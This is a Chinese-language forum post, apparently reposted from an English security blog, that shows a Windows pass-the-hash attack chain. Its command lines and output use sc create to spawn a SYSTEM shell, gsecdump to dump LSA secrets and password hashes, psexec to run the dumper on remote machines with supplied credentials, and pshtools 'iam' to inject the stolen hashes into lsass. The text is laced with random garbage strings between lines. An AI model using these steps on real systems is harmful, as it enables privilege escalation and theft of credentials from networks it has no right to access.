HASH注入式攻击

admin

o get a DOS Prompt as NT system:
* ^: U% S/ G9 V$ ~; _) n% v! [" Y  }
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
' w6 J; B, R4 w4 Z
7 M* n% r4 t8 J; r3 B+ \C:\>sc start shellcmdline
+ }" ]: w. S, m6 ?1 }[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

+ G5 a; ]  H( x& g* r7 p, z9 SC:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
2 c1 U- f( W, y8 H! L
0 }9 K7 y2 K: r  D* c+ E+ H------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
# Z5 @9 z- n0 r$ I7 w(C) Copyright 1985-2001 Microsoft Corp.

# ]2 `5 _' N) M$ t. J# A: R7 ]- QC:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
7 a/ I" h, b  `. i- Q. n1 H8 E; }
0 f+ |9 [3 H: @, H6 }& C. v  LC:\WINDOWS\system32>gsecdump -h
7 ^6 f/ G4 l' xgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
/ J8 h' U6 |& G. _& ]2 m; v  Busage: gsecdump [options]

1 C% j8 `" k' N& Uoptions:
: l5 ^2 a5 n* u: N( q5 O-h [ --help ] show help
% T! _5 O6 h' G' U( `-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
% w; h# d/ T! _- K2 D) B-s [ --dump_hashes ] dump hashes from SAM/AD

% [  S1 R) ~: r  PAlthough I like to use:
& g: F" S& ]* v- C% A8 H
PsExec v1.83 - Execute processes remotely
+ `; ?% A& o+ o/ J" D3 nCopyright (C) 2001-2007 Mark Russinovich
6 E4 }! O0 A9 }Sysinternals - 链接标记[url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
; Q/ G1 x8 u: S6 ^3 j1 l4 E
to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

4 e) @. O) L2 L( W1 c提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
1 ^5 L/ X- Q- u8 ]
我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。